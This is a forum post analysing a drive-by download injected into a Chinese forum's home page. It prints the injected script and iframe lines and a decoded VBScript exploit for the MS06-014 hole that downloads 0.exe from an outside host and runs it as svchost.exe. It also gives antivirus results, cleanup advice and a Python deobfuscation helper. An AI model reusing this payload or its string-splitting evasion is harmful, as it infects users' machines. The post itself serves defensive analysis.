Mumayi forum hit by a drive-by download; NOD32 users are safe and sound!

This time the malicious code sits on the home page (bbs.mumayi.net). The following line was appended to the page source:

    <script id="advjs" src="http://web.77276.com/adv.js?showmatrix_num=056"></script>

From showmatrix_num=056 in that URL and the content of adv.js:

    document.write("<iframe src=\"http://web.77276.com/1/"+u_num+".htm\" width=\"0\" height=\"0\" frameborder=\"0\"></iframe>");

we can tell that it loads http://web.77276.com/1/056.htm. That 056.htm redirects once more, to http://web.77276.com/0.htm. Opening its source shows nothing but long runs of three-digit numbers, obviously ASCII codes; after converting them the fox finally showed its tail. Here it is:

    on error resume next
    tc = "http://do.77276.com/0.exe"
    fname1="svchost.exe"
    fname2="svchost.vbs"
    ' every ProgID and the CLSID are split with & so they never appear whole in the source
    Set df = document.createElement("o"&"b"&"j"&"e"&"c"&"t")
    ' BD96C556-65A3-11D0-983A-00C04FC29E36 is the RDS.DataSpace control (the MS06-014 hole)
    df.setAttribute "c"&"l"&"a"&"s"&"s"&"i"&"d", "c"&"l"&"s"&"id:"&"BD96C5"&"56"&"-65"&"A3"&"-11"&"D0"&"-98"&"3A"&"-00"&"C04"&"FC2"&"9E"&"36"
    str="Mic"&"ro"&"so"&"ft."&"X"&"M"&"L"&"HT"&"TP"
    str5="A"&"d"&"o"&"d"&"b."&"S"&"tr"&"e"&"am"
    Set x = df.CreateObject(str,"")
    set S = df.createobject(str5,"")
    S.type = 1
    str6="G"&"E"&"T"
    ' fetch 0.exe over XMLHTTP and write it to the temp folder as svchost.exe
    x.Open str6, tc, False
    x.Send
    set F = df.createobject("Scripting.FileSystemObject","")
    set tmp = F.GetSpecialFolder(2)
    fname1= F.BuildPath(tmp,fname1)
    S.open
    S.write x.responseBody
    S.savetofile fname1,2
    S.close
    ' write svchost.vbs, a one-line launcher for svchost.exe
    fname2= F.BuildPath(tmp,fname2)
    set ts = F.OpenTextFile(fname2, 2, True)
    ts.WriteLine "Set Shell = CreateObject(""Sh""&""ell""&"".App""&""lic""&""at""&""ion"")"
    sql="Shell.ShellExecute"""+fname1+""","""","""",""o""&""p""&""e""&""n"",0"
    ts.writeLine sql
    ts.close
    if F.FileExists(fname1)=true then
    if F.FileExists(fname2)=true then
    set Q = df.createobject("She"&"ll."&"App"&"li"&"ca"&"tion","")
    dc="o"&"p"&"e"&"n"
    Q.ShellExecute fname2,"","",dc,0
    end if
    End if

It downloads http://do.77276.com/0.exe into the temp folder as svchost.exe and creates svchost.vbs to launch svchost.exe.

Below are the multi-engine scan results for 0.exe. The verdicts are inconsistent, and the sample crashed when run in a virtual machine, so for now it cannot be said exactly which virus this is; most verdicts lean towards Viking, so it is presumably Viking.

    Engine          Version         Date         Result
    AhnLab-V3       2007.3.24.1     03.24.2007   Win32/Viking.suspicious
    AntiVir         7.3.1.44        03.23.2007   TR/Crypt.NSPM.Gen
    Authentium      4.93.8          03.24.2007   Possibly a new variant of W32/PWStealer.gen1
    Avast           4.7.936.0       03.23.2007   Win32:Tibs-ADO
    AVG             7.5.0.447       03.24.2007   no virus found
    BitDefender     7.2             03.25.2007   GenPack:Win32.Worm.Viking.IZ
    CAT-QuickHeal   9.00            03.23.2007   (Suspicious) - DNAScan
    ClamAV          devel-20070312  03.25.2007   no virus found
    DrWeb           4.33            03.25.2007   Win32.HLLW.Gavir.54
    eSafe           7.0.14.0        03.22.2007   suspicious Trojan/Worm
    eTrust-Vet      30.6.3506       03.23.2007   Win32/Looked.HN
    Ewido           4.0             03.24.2007   no virus found
    FileAdvisor     1               03.25.2007   no virus found
    Fortinet        2.85.0.0        03.25.2007   suspicious
    F-Prot          4.3.1.45        03.23.2007   W32/PWStealer.gen1
    F-Secure        6.70.13030.0    03.24.2007   Viking.gen
    Ikarus          T3.1.1.3        03.25.2007   Trojan-PWS.Win32.OnLineGames.id
    Kaspersky       4.0.2.24        03.25.2007   no virus found
    McAfee          4991            03.23.2007   no virus found
    Microsoft       1.2306          03.25.2007   no virus found
    NOD32v2         2143            03.25.2007   Win32/Pacex.Gen
    Norman          5.80.02         03.23.2007   Viking.gen
    Panda           9.0.0.4         03.24.2007   Suspicious file
    Prevx1          V2              03.25.2007   Trojan.SystemPoser
    Sophos          4.15.0          03.23.2007   no virus found
    Sunbelt         2.2.907.0       03.24.2007   no virus found
    Symantec        10              03.25.2007   W32.Lo
If you find svchost.vbs and svchost.exe in your temp folder, clean them up immediately and install the MS06-014 patch: http://www.microsoft.com/china/t ... letin/ms06-014.mspx
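As an added example (not from the original post), here is a small Python helper for the two obfuscation layers described above: the decimal-ASCII encoding of 0.htm and the "o"&"b"&"j" string splitting inside the decoded VBScript. The sample blob is constructed here from a fragment modelled on the page's script; the decoder assumes the numeric codes are separated by non-digit characters (such as &#...; entities or spaces).

```python
import re

# CLSID of the MDAC RDS.DataSpace control abused through MS06-014; the page's
# VBScript rebuilds exactly this GUID from string fragments.
RDS_DATASPACE_CLSID = "BD96C556-65A3-11D0-983A-00C04FC29E36"

# Constructed sample fragment in the style of the decoded 0.htm script.
SAMPLE_FRAGMENT = (
    'tc = "http://do.77276.com/0.exe"\n'
    'Set df = document.createElement("o"&"b"&"j"&"e"&"c"&"t")\n'
    'df.setAttribute "c"&"l"&"a"&"s"&"s"&"i"&"d", "c"&"l"&"s"&"id:"&"BD96C5"&"56"'
    '&"-65"&"A3"&"-11"&"D0"&"-98"&"3A"&"-00"&"C04"&"FC2"&"9E"&"36"\n'
    'str="Mic"&"ro"&"so"&"ft."&"X"&"M"&"L"&"HT"&"TP"\n'
)
# Constructed numeric blob: each character as a decimal entity, as 0.htm did.
SAMPLE_BLOB = "".join(f"&#{ord(c)};" for c in SAMPLE_FRAGMENT)


def decode_decimal_ascii(blob: str) -> str:
    """Turn runs of decimal character codes ('111 110' or '&#111;&#110;') into text.

    Assumption: codes are separated by non-digit characters; values above 255
    are not character codes and are skipped.
    """
    return "".join(chr(int(n)) for n in re.findall(r"\d+", blob) if int(n) < 256)


def join_concat(vbs: str) -> str:
    """Collapse VBScript literal concatenation so "o"&"b"&"j" becomes "obj"."""
    return re.sub(r'"\s*&\s*"', "", vbs)


def analyze(blob: str) -> dict:
    """Decode both layers and pull out the indicators a responder cares about."""
    script = join_concat(decode_decimal_ascii(blob))
    guid = r"[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}"
    clsids = sorted({m.upper() for m in re.findall(guid, script)})
    urls = re.findall(r"https?://[^\s\"']+", script)
    return {
        "script": script,
        "clsids": clsids,
        "urls": urls,
        "ms06_014": RDS_DATASPACE_CLSID in clsids,
    }


if __name__ == "__main__":
    report = analyze(SAMPLE_BLOB)
    print(report["script"])
    print("download URLs:", report["urls"])
    print("MS06-014 RDS.DataSpace CLSID present:", report["ms06_014"])
```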
Welcome to Black Coastline Forum (http://bbs.thysea.com/) | Powered by Discuz! 7.2